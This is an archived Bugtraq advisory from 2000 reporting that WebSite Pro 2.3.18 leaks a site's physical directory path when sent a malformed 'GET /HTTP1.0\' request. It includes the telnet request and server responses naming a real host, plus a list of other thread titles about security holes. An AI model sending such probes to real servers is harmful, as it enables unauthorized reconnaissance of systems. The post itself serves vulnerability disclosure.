Bugtraq mailing list archives

WebSitePro/2.3.18 is revealing Webdirectories

From: webmaster () DOC2000 DE (Lark Lizerman)
Date: Wed, 12 Jan 2000 19:35:25 -0800


Dear Bugtraqers,

Description:

WebSite Pro is also revealing the webdirectory of each Website by a simple command line.
This bug is similar to the "IIS revealing webdirectories" bug reported on bugtraq.
On WebSitePro the diference ist the way you retrieve the path.

Example:

(Made with MS Windows Telnet Client)

Logfile:

-----------------------------------------------------------------------start-------------------------------------------------------------------
GET /HTTP1.0\    <------ Our command we send via Telnet on port 80 to the webserver

Response:

Content-length: 186
 
<HTML><HEAD><TITLE>Document Moved</TITLE></HEAD>
                                                <BODY bgcolor="White"><H2>Docume
nt Moved</H2>
             This document has moved <A HREF="http://www.akte.net/HTTP1.0/";>here
</A>.<P>
        </BODY></HTML>
GET /HTTP1.0/
Content-length: 230
 
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
                                               <BODY bgcolor="White"><H2>404 Not
 Found</H2>
           The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>(
D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P>
                                                    </BODY></HTML>

-------------------------------------------------------------------end-------------------------------------------------------------------

Here it shows us, that the HTML files are in D:\WEBROOTS\VHOSTS\aktenet\htdocs.
It's not a large threat but an attacker might  gain information about the server which should stay
in Admin's hands. On all Webservers e.g. MS IIS and Apache the response is "error 404".

-------cut------
Elias: I have some html in this mail, try to send it as clear text, as it is, please.
Else people with html capable browsers will only get half of the logfile.
Thx:-)
------cut------
-------------------------------
Lark Lizerman

lizerman () doc2000 de
-------------------------------

Current thread:

Re: Anyone can take over virtually any domain on the net..., (continued)
- - - Re: Anyone can take over virtually any domain on the net... Jon Lewis (Jan 13)
    - Re: Anyone can take over virtually any domain on the net... Jeffrey Paul (Jan 13)
    - Re: Anyone can take over virtually any domain on the net... Chris Adams (Jan 13)
    - Re: Anyone can take over virtually any domain on the net... Shafik Yaghmour (Jan 13)
    - Re: Anyone can take over virtually any domain on the net... Nick Lamb (Jan 15)
    - Re: Anyone can take over virtually any domain on the net... Kurt Seifried (Jan 13)
    - Blinding BIND to a moving domain D. J. Bernstein (Jan 12)
    - Re: Blinding BIND to a moving domain Ken Gourlay (Jan 12)
    - CyberCash MCK 3.2.0.4: Large /tmp hole Sheldon Young (Jan 12)
    - Administrivia: ORBS Elias Levy (Jan 12)
    - WebSitePro/2.3.18 is revealing Webdirectories Lark Lizerman (Jan 12)
    - Re: Hotmail security hole - injecting JavaScript using <IMG Grahame Bowland (Jan 05)
  - Yet another Hotmail security hole - injecting JavaScript in IE using "@import url(javascript:...)" Georgi Guninski (Jan 06)
  - Security Bulletins Digest Aleph One (Jan 06)
- Re: Hotmail security hole - injecting JavaScript using <IMG Metal Hurlant (Jan 05)
  - Re: Hotmail security hole - injecting JavaScript using <IMG Dustin Miller (Jan 05)
- Re: Hotmail security hole - injecting JavaScript using <IMG Edwin Gonzalez (Jan 04)
- Re: Hotmail security hole - injecting JavaScript using <IMG ck () RIB DE (Jan 07)